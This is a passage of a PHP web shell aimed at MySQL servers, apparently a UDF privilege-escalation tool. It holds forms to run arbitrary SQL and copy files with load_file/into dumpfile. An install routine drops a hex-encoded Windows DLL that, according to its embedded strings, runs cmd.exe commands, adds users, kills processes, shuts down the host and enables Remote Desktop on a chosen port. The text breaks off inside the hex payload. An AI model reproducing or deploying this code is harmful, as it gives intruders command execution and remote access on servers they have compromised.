rows="5" name="sql">.$sql.</textarea><br/><input type="submit" value="Mysql_query"> <input type="button" value="Load_File" onclick="loadfile()"> <input type="button" value="Into OutFile" onclick="outfile()"></form>;}function cplug(){$path = $_GET[dir];$path = base64_decode($path);$arr = explode(\\,$path);$p = ;$err = ;for ($index = 0,$count = count($arr);$index<$count;$index++) {$p .= ($arr[$index] . \\);if (!file_exists($p)) {if (!mkdir($p)) {$err = create .$p.failed !;break;}}}conn();if ($err != )exit($err);if (file_exists($path))echo plugin_dir create success !;elseecho plugin_dir create failed !;}function execsql() {$conn = conn(false);$sql = $_POST[sql];if (get_magic_quotes_gpc())$sql = stripslashes($sql);$rs = mysql_query($sql,$conn);echo mysql_info($conn);if (@mysql_num_rows($rs) > 0) {echo <table border="1">;$cols = mysql_num_fields($rs);$index = 0;echo <tr>;while ($index < $cols) {echo <th>.mysql_field_name($rs,$index).</th>;$index ++;}echo </tr>;while ($row = mysql_fetch_row($rs)) {$index = 0;echo <tr>;while ($index < $cols) {echo <td>;echo str_replace(chr(13),<br/>,htmlspecialchars($row[$index]));echo </td>;$index ++;}echo </tr>;}echo </table>;}if (mysql_errno($conn) != 0)echo mysql_error();mysql_close($conn);}function cp(){$conn = conn(false);$source = $_POST[source];$target = $_POST[target];if (get_magic_quotes_gpc()) {$source = stripslashes($source);$target = stripslashes($target);}mysql_query(select unhex(hex(load_file(".$source."))) into dumpfile ".$target.");if (mysql_errno($conn) != 0)echo mysql_error().<br/>;elseecho done !;mysql_close($conn);}function install() {//dump udf.dll$conn = conn(false);$path = $_POST[path];if (get_magic_quotes_gpc())$path = stripslashes($path);mysql_query(create table udftmp (c blob));if (mysql_errno($conn) != 0) {echo mysql_error().<br/>;mysql_query(drop table udftmp);mysql_close($conn);exit();}mysql_query(insert into udftmp values(convert(0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000007148657F35290B2C35290B2C35290B2C35290B2C3F290B2CF626562C31290B2C4E35072C34290B2C5A36012C31290B2CB635052C36290B2C5A360F2C31290B2C5A36002C34290B2C5736182C3E290B2C35290A2C56290B2CF6266B2C38290B2CF626572C34290B2CF626512C34290B2C5269636835290B2C00000000000000000000000000000000504500004C010400BFC7514B0000000000000000E0000E210B01070A00220000001C0000000000002D300000001000000040000000000010001000000002000004000000000000000400000000000000008000000004000000000000020000000000100000100000000010000010000000000000100000002052000070000000A44A0000B40000000000000000000000000000000000000000000000000000000070000064020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000004C0100000000000000000000000000000000000000000000000000002E746578740000000C210000001000000022000000040000000000000000000000000000200000602E7264617461000090120000004000000014000000260000000000000000000000000000400000402E64617461000000500000000060000000020000003A0000000000000000000000000000400000C02E72656C6F630000080400000070000000060000003C00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000558BEC83EC14578D45FC506A28FF156040001050FF151C4000108B450CF7D81BC083E0028945F88D45F050FF7508C745EC010000006A00FF15204000106A006A006A108D45EC506A00FF75FCFF15244000108BF885FF7500FF75FCFF15A44000108BC75FC9C3558BEC81EC8004000053568B35804000105733DB538D45D4508D45EC5033FF8D45F44750885DFF885DFEC745D40C000000895DD8897DDCFFD685C00F84F3000000538D45D4508D45E4508D45F050FFD685C00F84DC0000008D458050FF15844000108B45F08945B88B45EC8945C08945BC8D45C4508D458050535353575353FF750CC745AC010100005366895DB0FF158840001085C00F84980000008B3534400010C645FF01FFD68B3D8C4000108945E8EB67395DF87642B8000400003945F872038945F8538D45E050FF75F88D8580FBFFFF50FF75F4FF159040001085C07453FF75E08B4D088B018D9580FBFFFF52FF5004FFD68945E8EB1853FF75C4FF159440001085C0742CFFD62B45E83B4510731E6A07FF159C400010538D45F850535353FF75F4895DF8FFD785C07585EB04C645FE01FF15A0400010385DFF8B35A44000108BF8741E385DFE740F395D14740A53FF75C4FF15A8400010FF75C8FFD6FF75C4FFD6395DF07405FF75F0FFD6395DEC7405FF75ECFFD6395DE47405FF75E4FFD6395DF47405FF75F4FFD657FF15B04000105F5E33C05BC9C3837C24040274138B44240C8B08686041001050FF51085959EB48568B74240C57566A02E8A2010000050004000050FF1508410010FF76048BF8685041001057FF15044100106A0168E02E000057FF742438E80FFEFFFF57FF150041001083C42C5F5E33C0C3837C24040274138B44240C8B08687C41001050FF51085959EB1A8B4424086A0068D0070000FF7004FF742418E8CFFDFFFF83C41033C0C38BC18B4C24048948088B4C240889480C8A4C240CC70098410010884804C7401002000000C20C00C70198410010C3F644240401568BF1C70698410010740756E8021C0000598BC65EC20400565733FF8BF147397E087E52807E04008B460C8B04B88A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C05959740D473B7E087CAE32C05F5EC20400B001EBF756578BF1836614006A025F397E087E62807E04008B460C8B44B8FC8A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C059597408473B7E087CADEB0D8B460C8B04B847894614897E108B46145F5EC20400565733FF33F6397C240C7E188B442410FF34B8E8111B0000473B7C2410598D7406017CE85F8BC65EC333C0390510600010740D5050A310600010FF15444100108B0D24600010E89A0E00008B4C240489410C32C0C38B442404FF700C8B0D24600010E875180000C3558BEC518B0D246000108365FC00568B7514568D45FC508B450CFF7008FF308B4508FF700CE80F190000833EFF7516837DFC00740DFF75FCE8841A0000598906EB038326008B45FC8B551885C00F94C1880A5EC9C3837C240801752B8B4424046A2CA320600010E85B1A000085C05974098BC8E879180000EB0233C085C0A324600010752AEB2B837C24080075218B0D2460001085C97417568BF1E8BE17000056E80A1A000083252460001000595E33C040C20C00558BEC83EC1453578D45F8506A08FF750833DB895DF8895DF4FF151C4000108BF83BFB7467568B35144000108D45FC5053536A01FF75F8895DFCFFD6395DFC8BF87648FF75FCE8C7190000598D4DFC51FF75FC8945F4506A01FF75F8FFD68BF83BFB74278D45EC508D45F050FF750C8D451450FF75108B45F4C745F004010000FF3053FF15184000108BF85E395DF87409FF75F8FF15A4400010395DF47409FF75F4E854190000598BC75F5BC9C38B4424048B0868A041001050FF51085959C3558BECB838250000E85B1900006683A5D4FDFFFF006683A5D8FEFFFF005356576A4033C0598DBDD6FDFFFFF3AB66AB6A4033C0598DBDDAFEFFFFF3AB33DB43395D0C66AB8BC3C645FD00C645FA00C645FF00C645FE00C645FB00C645FC008945F40F86B30000008B75108B3DFC400010C1E0028B0C3080392D75710FBE510183EA6B743A4A74314A7562837D0C030F8C900000008A490280F970C645FA01741280F97375478B443004C645FE018945DCEB3AC645FF01EB1DC645FD01EB2E837D0C037C670FBE490283E96E74144949751BC645FB01FF743004FFD7598945ECEB0B8B443004C645FC018945E08B45F4403B450C8945F40F8274FFFFFF807DFD007530807DFF00752A807DFE007524807DFB00751E807DFC007518FF7508E8CCFEFFFFEB4368CC420010EB3268B0420010EB2B53689C420010E81BF9FFFF59598D45E45068001000008D85C8DAFFFF50E8E619000085C0751768804200108B45088B0850FF510859598BC3E9B30200008365F400F745E4FCFFFFFF0F86A00200008D9DC8DAFFFFBE04010000FF338B3D384000106A006810040000FFD785C089450C0F84640200008365E80068001000008D85C8EAFFFF6A0050E89A170000568D85D4FDFFFF6A0050E88B170000568D85D8FEFFFF6A0050E87C170000568D85D0FCFFFF6A0050E86D170000568D85CCFBFFFF6A0050E85E170000568D85D4FDFFFF508D85D8FEFFFF50FF750CE82FFDFFFF83C44C8D45E85068001000008D85C8EAFFFF50FF750CE80819000085C0742C568D85D0FCFFFF50FFB5C8EAFFFFFF750CE8E8180000568D85CCFBFFFF50FFB5C8EAFFFFFF750CE8CC180000807DFB0074078B45EC3903741C807DFC007463FF75E08D85CCFBFFFF50FF15CC40001085C05959754DFF750CFF15A4400010FF336A006A01FFD785C08B7D0889450C74358B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4186A00FF750CFF15A8400010EB038B7D08807DFD0074258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C418807DFF0074148B45EC3B03750D8B07685442001057FF50085959807DFA000F84DE0000008365F000F745E8FCFFFFFF0F86CD000000807DFF0074568B45EC3B030F85BC000000568D85C8FAFFFF6A0050E8031600008B7DF083C40C568D85C8FAFFFF508DBCBDC8EAFFFFFF37FF750CE8BA170000FF378B45088B088D95C8FAFFFF52684442001050FF51088B7D0883C410807DFE007459568D85CCFBFFFF508B45F0FFB485C8EAFFFFFF750CE87717000085C0743BFF75DC8D85CCFBFFFF50FF15EC40001085C0595974258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4188B45E8FF45F0C1E8023945F00F8233FFFFFFFF750CFF15A44000108B45E4FF45F4C1E80283C3043945F40F826BFDFFFF33C05F5E5BC9C3558BEC51568D45FC50681900020033F656FF750CFF7508FF150840001085C075278D451850FF75145656FF7510FF75FCFF150C40001085C07403897518FF75FCFF1510400010EB038975188B45185EC9C3558BEC5151538B5D10578D45FC50FF750C33FF397D20FF7508897DF87508FF1528400010EB2FFF152C40001085C0757957578D4514505753FF75FCFF150C40001085C07564837D2002750E53FF75FCFF150040001085C07550837D1401568B35044000107406837D1402751CFF7518E860140000594050FF7518FF75145753FF75FCFFD685C07520837D140475136A048D451C506A045753FF75FCFFD685C07507C745F8010000005EFF75FCFF15104000108B45F85F5BC9C3558BEC51576810430010FF15404000108BF885FF744A53568B353C40001068FC42001057FFD68BD885DB743268E842001057FFD68BF085F674248D45FC506A016A016A13FFD63D7C0000C0750C8D45FC506A006A016A13FFD6FF7508FFD35E5B5FC9C3566A016870430010E8B7F4FFFF8B7424108B06685843001056FF50088B44241C33C983C4103BC175135151FF152C41001085C075566844430010EB3083F8017514516A06FF152C41001085C0753D6830430010EB1783F802751B516A0CFF152C41001085C07524681C4300108B0656FF500859EB1583F80375046A01EB0783F80475086A02E813FFFFFF5933C0405EC3558BEC837D0C027C288B45108B400480382D751D4050FF15FC40001085C0597C1083F8047F0B50FF7508E841FFFFFFEB0E8B45088B08688843001050FF5108595933C05DC3A13060001085C0752168504400106844440010FF154040001050FF153C40001085C0A3306000107501C36A01FF74240C6A00FFD00FB6C0C3A12860001085C07521686C4400106860440010FF154040001050FF153C40001085C0A3286000107501C36A01FF742408FFD0C3558BEC83EC6456578D45E8508D45E4506A0133FF5757E85D1400003BC78945DC751F8B75088B3EFF15A040001050681045001056FF570883C40C33C0E929010000538B5D088B0368B844001053FF5008397DE88B75E45959897DF00F86FD0000008D45EC508D45FC506A0E897DFC897DF8897DF4FF3657E8F61300008D45EC508D45F8506A0AFF3657E8E41300008D45EC508D45F4506A05FF3657E8D2130000FF7608E825FFFFFF5957576A208D4D9C51508945E0FF15E4400010598D44000250FF75E05757FF15444000108B45FC83380275280FB64809510FB64808510FB648070FB6400651508D45BC68AC44001050FF150441001083C418EB118D45BC68A444001050FF150441001059598B038D4D9C518D4DBC51FF75F8FF75F4FF7604FF36687C44001053FF500883C420FF75FCE836130000FF75F8E82E130000FF75F4E82613000057E82013000083C60CFF45F08B45F03B45E80F8203FFFFFFFF75E4E8061300008B45DC5B5F5EC9C3560FB774240C85F674426A00566A006A0468E045001068984500106802000080E811FCFFFF83C41C85C08B4424088B08740F56686445001050FF510883C40C5EC3683C45001050FF510859595EC3558BEC83EC0C8365F8008365FC0056576A048D45FC50BF9C460010576870460010BE0200008056C745F401000000E864FBFFFF83C41485C07449837DFC0275436A048D45FC5057684046001056E845FBFFFF83C41485C0742A837DFC0275246A048D45F8506834460010BF004600105756E821FBFFFF83C41485C07406837DF800750432C0EB246A048D45F45068EC4500105756E8FEFAFFFF83C41485C07504B001EB07837DF4000F94C05F5EC9C3E84CFFFFFF84C0B9D04600107505B9C44600108B4424048B105168A446001050FF520883C40CC3558BEC83EC108D45FC5068190002006A0068984500106802000080C745F83D0D0000C745F004000000C745F450000000FF150840001085C075488D45F4508D45F8508D45F0506A0068E0450010FF75FCFF150C40001085C0751FFF75F88B45088B0868F046001050FF510883C40CFF75FCFF1510400010C9C3FF75FCFF15104000108B45088B0868D846001050FF51085959C9C3FF742404E83CFFFFFF59E95DFFFFFF515355565733DB536A02536A04BF9C460010576870460010BE0200008056E84CFAFFFF536A02536A0457684046001056E83AFAFFFF8944244833C0385C24546A010F94C0BF0046001050536A0468EC4500105756E816FAFFFF8BE883C4543BEB7406385C241C742133C0385C241C530F95C050536A0468344600105756E8EDF9FFFF83C41C3BC375043BEB7420395C2410741A385C241C8B4424188B0874076850470010EB126830470010EB0B8B4424188B08680C47001050FF510859595F5E5D5B59C3B802310010E8D10E000083EC18837D0C027D158B45088B0868A047001050FF51085959E9EE00000053565733F656FF75108D4DDCFF750CE8ECF1FFFF68984700108D4DDC8975FCE890F2FFFF8B5D0833FF4785C07415FF75F08BF7FF15FC4000105053E80DFDFFFF83C40C68904700108D4DDCE8FBF1FFFF84C0740357EB1368884700108D4DDCE8E7F1FFFF84C0740C6A00538BF7E8A2FEFFFF595968804700108D4DDCE8CAF1FFFF84C07409538BF7E878FEFFFF5968784700108D4DDCE8B0F1FFFF84C07409538BF7E838FBFFFF5968704700108D4DDCE8FFF1FFFF85C07415FF75F08BF7FF15FC4000105053E8A9FAFFFF83C40C85F6750D8B0368A047001053FF50085959834DFCFF8D4DDCE83CF1FFFF5F5E5B8B4DF433C064890D00000000C9C3568B7424108326006A106890490010FF742414E8BF0D000083C40C85C075108B44240889068B0850FF510433C0EB05B8024000805EC20C008B44240483C00450FF1548400010C20400568B742408578D460450FF154C4000108BF885FF750D85F674098B066A018BCEFF500C8BC75F5EC20400F644240401568BF1C70680490010740756E8C10C0000598BC65EC20400568BF18B861C0100005733FF3BC7740D50FF155840001089BE1C0100008B86180100003BC7740D50FF15A440001089BE180100005757576A0457FF760CFF15544000103BC7898618010000750433C0EB15575757681F000F0050FF155040001089861C0100005F5EC383B91C0100000074128B490C83F9FF740A6A0051FF155C400010C333C0C351FF1548400010C38B4424048B1534600010EB028BC18B48083BCA75F7C38B4424048B1534600010EB028BC18B083BCA75F8C38B5424048B02568B700889328B70083B353460001074038956048B72048970048B49043B51045E7505894104EB0F8B4A043B51087505894108EB028901895008894204C20400568BF18B0E83791400750D8B410439480475058B4108EB1E8B013B0534600010740D50E867FFFFFF59EB0B89068BC88B41043B0874F589065EC3568BF18B0E8B41083B0534600010740D50E855FFFFFF59EB1389068BC88B41043B480874F48B0E394108740289065EC38B44240485C0740E8B4C24088B1189108B4904894804C353568BF133DB895E04C74608A049001068C849001053C706B8490010C74608AC490010FF15D8400010834E0CFF5959885E10899E18010000899E1C010000C78614010000010000008BC65E5BC3558BECB800200000E80C0B00008D451050FF750C8D8500E0FFFF50FF15D44000108B4D088B1183C40C508D8500E0FFFF50FF5204C9C3568BF1E814000000F644240801740756E8A10A0000598BC65EC20400568BF18B861C01000085C0C706B8490010C74608AC490010740750FF15584000108B861801000085C0578B3DA4400010740350FFD78B460C83F8FF740350FFD783BE14010000005F740F8D4610803800740750FF15AC400010C706804900105EC3566820010000E8450A000085C059740B8BC8E8E9FEFFFF8BF0EB0233F685F674068B0656FF50048BC65EC3558BEC518365FC00837D0CFF568BF1750CFF7508E8060A00005989450C837E04FF75106A016A008D4EF8E82100000085C074186A008D45FC50FF750CFF7508FF7604FF15984000108B45FC5EC9C20800558BEC81EC04010000568BF1578DBE1C0100008B0785C0740A50FF15584000108327008DBE180100008B0785C0538B1DA4400010740650FFD38327008B460C83F8FF740750FFD3834E0CFF83BE1401000000740F8D4610803800740750FF15AC400010837D08007412FF75088D7E1057E8E2090000595933DBEB278D85FCFEFFFF506804010000FF156C4000108D7E105733DB53538D85FCFEFFFF50FF156840001053536A02535368000000C057FF156440001083F8FF89460C5B7507C6070033C0EB0C8B450C89861401000033C0405F5EC9C208008B5424048B4208568B308972088B303B353460001074038956048B72048970048B49043B51045E7505894104EB0E8B4A043B1175048901EB038941088910894204C204008B41048B48048B15346000103BCA741A568B7424088B3639710C7D058B4908EB048BC18B093BCA75EE5EC204005356578B7C24103B3D346000108BD98BF7741DFF76088BCBE8E3FFFFFF8B3657E8520800003B3534600010598BFE75E35F5E5BC20400558BEC83EC105356894DF8578B7D0C8D4D0CE8AAFCFFFF8B37A1346000103BF08D5F08897DFC895DF475048B33EB188B0B3BC8741251E8F1FBFFFF8945FC83C0088B30598945F48D4DF0FF15B84000108B45FC3BC774608B0F8941048B0F89083B037505894604EB178B48048B55F4894E048B480489318B0B890A8B0B8941048B5DF88B4B043979047505894104EB0E8B4F04393975048901EB038941088B4F048948048B48148B5714895014894F14897DFC8BC7EB7B8B48048B55F8894E048B4A043979047505897104EB0E8B4F04393975048931EB038971088B4A043939894DF475238B1B3B1D3460001075078B5F048919EB1256E830FBFFFF8B55F8598B4DF489018B45FC8B5A04397B08751F8B0F3B0D3460001075088B4F04894B08EB0D56E8EEFAFFFF8943088B45FC598B5DF833FF473978140F850B010000E9B9000000397E140F85FA0000008B4E048B013BF075728B410883781400751A8978148B460483601400FF76048BCBE8E7FDFFFF8B46048B40088B0839791475088B4808397914746E8B480839791475178B0889791483601400508BCBE8A1FAFFFF8B46048B40088B4E048B49148948148B4E048979148B4008897814FF76048BCBE894FDFFFFEB7F8378140075198978148B460483601400FF76048BCBE860FAFFFF8B46048B008B4808397914751C8B083979147515836014008B76048B43043B70040F853BFFFFFFEB3C8B0839791475178B480889791483601400508BCBE836FDFFFF8B46048B008B4E048B49148948148B4E048979148B00897814FF76048BCBE8FBF9FFFF897E148D4DF0FF15BC400010FF75FCE8E7050000FF4B0C8B4508598B4D0C5F5E89085BC9C20800558BEC51568BF1837E0C008B4D0C74388B46043B087531394510752CFF70048BCEE837FDFFFF8B0D346000108B46048948048B460483660C0089008B46048940088B46048B08EB253B4D107420578BF98D4D0CE8FCF9FFFF578D45FC508BCEE82FFDFFFF8B4D0C3B4D1075E25F8B450889085EC9C20C00558BEC5156578B7D0C578BF1E8A8FCFFFF8B76043BC689450C740C8B0F3B480C7C058D450CEB068975FC8D45FC8B088B45085F89085EC9C20800558BEC51515356576A188BF9E8290500008BF05933DB8D4DF8895E04C74614010000008975FCFF15B8400010391D346000107513893534600010891EA134600010895DFC895808FF05386000108D4DF8FF15BC400010395DFC7409FF75FCE8C0040000598B35346000106A18E8C9040000897004895814894704895F0C5989008B47045F5E8940085BC9C3558BEC5356576A188BD9E8A00400008B7510FF75148BF883671400897704A1346000108907A1346000108947088D470C50E812F9FFFF83C40CFF430C3B730474258B450C3B0534600010751A8B45148B003B460C7C10897E088B43043B7008751C897808EB17893E8B43043BF075088978048B4304EBEA3B30750289388B43043B78048BF70F84B00000008B4604837814000F85A30000008B50048B0A3BC175598B4A0883791400751E8B560433C0408942148941148B46048B4004836014008B46048B7004EB673B7008750A8BF0568BCBE8D9FAFFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE8A0F7FFFFEB358379140074AA3B30750A8BF0568BCBE88AF7FFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE881FAFFFF8B43043B70040F8550FFFFFF8B43048B4004C74014010000008B450889385F5E5B5DC21000558BEC51568BF18B46048B0850518D45FC508BCEE857FDFFFFFF7604E8230300008366040083660C00598D4DFC33F6FF15B8400010FF0D38600010750D8B3534600010832534600010008D4DFCFF15BC40001085F6740756E8E7020000595EC9C3558BEC515356578BF98B47048B70048BD8A1346000103BF0B201741C8B4D0C8B093B4E0C8BDE0F9CC284D274048B36EB038B76083BF075E9807F08007405FF750CEB2684D28BCB894DFC74128B47043B1874EB8D4DFCE8CEF6FFFF8B4DFC8B510C8B450C3B107D195053568D450C508BCFE8D5FDFFFF8B088B4508C6400401EB078B4508C64004005F5E89085BC9C20800568BF18D461450FF15704000108D4E045EE9F8FEFFFF558BEC515153568BF18D461457508945F8FF15784000108D4508508D45FC8D5E04508BCBE8B6FCFFFF8B7DFC3B7E0874198B471085C074068B0850FF5108578D4508508BCBE8B1F9FFFFFF75F8FF15744000105F5E5BC9C20400558BEC5151FF750C8D45F850E8EEFEFFFF8B45088B4DF889088A4DFC884804C9C20800568BF18D4E04C6410800E88DFCFFFF8326008D461450FF157C4000108BC65EC3558BEC83EC108B45088B008365FC008945F88D45F8508D45F050E89EFFFFFF8B0083C010C9C20400558BEC518B4518568B75148326008308FF837D0C00894DFC750CA1146000108906E94A010000538B1DCC400010578B7D1068784A0010FF37FFD385C059590F842301000068744A0010FF37FFD385C059590F8410010000E8E2F6FFFF8BF085F6750E8B4514C700644A0010E9FE00000068604A0010FF37FFD385C0595975158D46085057FF750CE809E4FFFF83C40CE99700000068584A0010FF37FFD385C05959750F8D46085057FF750CE84AE4FFFFEBDA684C4A0010FF37FFD385C05959750F57FF750C8D460850E892EDFFFFEBBC68484A0010FF37FFD385C05959750F57FF750C8D460850E850E7FFFFEB9E68404A0010FF37FFD385C05959750F57FF750C8D460850E8FFF1FFFFEB808D7E088B0768284A001057FF50088B0759596AFFFF35146000108BCFFF50048BCEE88BF3FFFF8B4D1489018BCEE8E8F3FFFF8B5DFC8B4D188D7B14578901FF15784000108D4508508D4B04E87CFEFFFF578930FF1574400010EB07A11460001089065F5B33C05EC9C21400FF742404E80200000059C3FF2500410010FF25F4400010FF25F0400010FF25E8400010CCCCCCCCCCCCCCCCCCCC513D001000008D4C2408721481E9001000002D0010000085013D0010000073EC2BC88BC485018BE18B088B400450C3CCFF25C4400010CCCCCCCCCCCCCCCCCCCC6AFF5064A100000000508B44240C64892500000000896C240C8D6C240C50C3CCFF25E0400010FF25DC400010FF25D04000108B44240885C0750E39053C6000107E2EFF0D3C6000108B0D1041001083F8018B09890D40600010753F6880000000FF150841001085C059A348600010750433C0EB66832000A14860001068046000106800600010A344600010E8EA000000FF053C6000105959EB3D85C07539A14860001085C074308B0D44600010568D71FC3BF072128B0E85C97407FFD1A14860001083EE04EBEA50FF150041001083254860001000595E6A0158C20C00558BEC538B5D08568B750C578B7D1085F67509833D3C60001000EB2683FE01740583FE027522A14C60001085C07409575653FFD085C0740C575653E815FFFFFF85C0750433C0EB4E575653E80BE4FFFF83FE0189450C750C85C07537575053E8F1FEFFFF85F6740583FE037526575653E8E0FEFFFF85C0750321450C837D0C007411A14C60001085C07408575653FFD089450C8B450C5F5E5B5DC20C00FF25C8400010FF2524410010FF2518410010FF251C410010FF2520410010FF2538410010FF253C410010FF25344100108D4DDCE9C2E1FFFFB8884A0010E934FEFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000000000000636D642E657865202F6320257300000055736167653A636D6420226E65742075736572220D0A0D0A0000000055736167653A6578656320226E65742075736572220D0A0D0A000000CB120010000000000D0A7073202D6C0920C1D0B3F6CBF9D3D0BDF8B3CC0D0A7073202D6D73206E616D650920C1D0B3F6BCD3D4D8C1CBD6B8B6A8C4A3BFE9C3FBB5C4BDF8B3CC0D0A7073202D6D70207069640920C1D0B3F6D6B8B6A8BDF8B3CCB5C4CBF9D3D0C4A3BFE90D0A7073202D6B70207069640920B9D8B1D5D2BBB8F6BDF8B3CC0D0A7073202D6B6E206E616D650920B9D8B1D5CBF9D3D0D6B8B6A8B5C4BDF8B3CCC3FB0D0A0000002573093C3078252E38583E0D0A0000004D6F64756C65506174680942617365416464726573730D0A0000000025640925735C25730925730D0A000000456E756D50726F6365737365732829206572726F722E0D0A000000005365446562756750726976696C656765000000007073202D6B6E206E616D650D0A7073202D6B70207069640D0A0000007073202D6D73206E616D650D0A7073202D6D70207069640D0A00000052746C41646A75737450726976696C65676500005A7753687574646F776E53797374656D000000004E54444C4C2E444C4C0000004661696C656420546F2053687574646F776E00004661696C656420546F205265626F6F74000000004661696C656420546F204C6F676F66660000000049732054616B696E6720506C6163652E2E2E2E2E2E0D0A00536553687574646F776E50726976696C656765000000000055534147453A0D0A20202020202073687574646F776E205B202D30313233345D0D0A2020202020202D30202020206C6F676F66662E0D0A2020202020202D31202020207265626F6F742E0D0A2020202020202D3220202020706F7765726F66662E0D0A2020202020202D33202020207375706572207265626F6F742E0D0A2020202020202D342020202073757065722073687574646F776E2E0D0A6578616D706C653A0D0A20202020202073687574646F776E202D330D0A0000000077696E7374612E646C6C000057696E53746174696F6E5265736574005554494C444C4C2E646C6C00537472436F6E6E656374537461746500252D3131642020252D3133732020252D3133732020252D3133732020252D313573202025730D0A00202020200000000025642E25642E25642E25640053657373696F6E49442020202053657373696F6E4E616D6520202020557365724E616D6520202020202020436C69656E744E616D6520202020202020495020202020202020202020202020202053746174650D0A00000000456E756D6572617465205465726D696E616C2053657373696F6E73204661696C65642E2025640D0A000000004661696C20546F20536574204E6577205465726D696E616C205365727669636520506F72740D0A00546865205465726D696E616C205365727669636520506F727420486173204265656E2053657420546F2025640D0A00000000000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D54637000000000506F72744E756D62657200006644656E795453436F6E6E656374696F6E73000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C20536572766572000000005453456E61626C656400000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D5365727669636500000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D44440000000053746172740000005465726D696E616C2053657276696365205374617475733A2025730D0A00000044697361626C656400000000456E61626C6564005265674F70656E4B65794578204572726F722E0D0A0000005465726D696E616C205365727669636520506F72743A2025640D0A00536574204E6577205465726D696E616C2053657276696365204661696C65640D0A000000536574205465726D696E616C20536572766963652044697361626C65640D0A00536574205465726D696E616C205365727669636520456E61626C65642E0D0A006C6F676F666600007175657279000000766965770000000064697361626C6500656E61626C65000070000000000000004445534352495054494F4E3A0D0A202020202020202020202020436F6E666967205465726D696E616C205365727669636520537570706F72747320323030302F78702F323030332E0D0A55534147453A0D0A2020202020207465726D737663202D656E61626C65202D64697361626C65202D76696577202D70203C6E6577706F72743E202D7175657279202D6C6F676F6666203C73657373696F6E2069643E0D0A2020202020202D656E61626C6520202020456E61626C65205465726D696E616C20536572766963652E0D0A2020202020202D64697361626C6520202044697361626C65205465726D696E616C20536572766963652E0D0A2020202020202D7669657720202020202056696577205465726D696E616C20536572766963652053657474696E67732E0D0A2020202020202D70202020202020202020536574204E6577205465726D696E616C205365727669636520506F72742E0D0A6578616D706C653A0D0A2020202020207465726D737663202D71756572790D0A2020202020207465726D737663202D6C6F676F666620310D0A2020202020207465726D737663202D656E61626C65202D7020333339390D0A2020202020207465726D737663202D7020333339390D0A2020202020207465726D737663202D766965770D0A0099210010D1210010E22100100C2200100000000000000000C000000000000046762F0010762F0010762F0010F7230010D5240010F723001099210010D1210010E22100102D2400102E4F4350000000000D0A68656C700D0A436D6420202020202020202D3E0D0A45786563202020202020202D3E0D0A53687574646F776E2020203D3E0D0A70732020202020202020203D3E0D0A5465726D537663202020203D3E0D0A0D0A000000556E6B6E6F776E20436F6D6D616E642E3A28200D0A0D0A005465726D537663007073000073687574646F776E000000004578656300000000436D6400455F4F55544F464D454D4F52590000003F00000068656C7000000000FFFFFFFFFA3000102005931901000000804A0010000000000000000000000000000000008C4B00000000000000000000E24E000034400000844C00000000000000000000004F00002C410000584B00000000000000000000EE4F0000004000009C4C000000000000000000000E50000044410000104C000000000000000000004C500000B84000001C4C000000000000000000002E510000C4400000704C00000000000000000000AA510000184100008C4C00000000000000000000FA510000344100000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000071025365744C6173744572726F7200009E025465726D696E61746550726F6365737300001B00436C6F736548616E646C65001A014765744C6173744572726F7200009602536C65657000DF02577269746546696C6500CE0257616974466F72536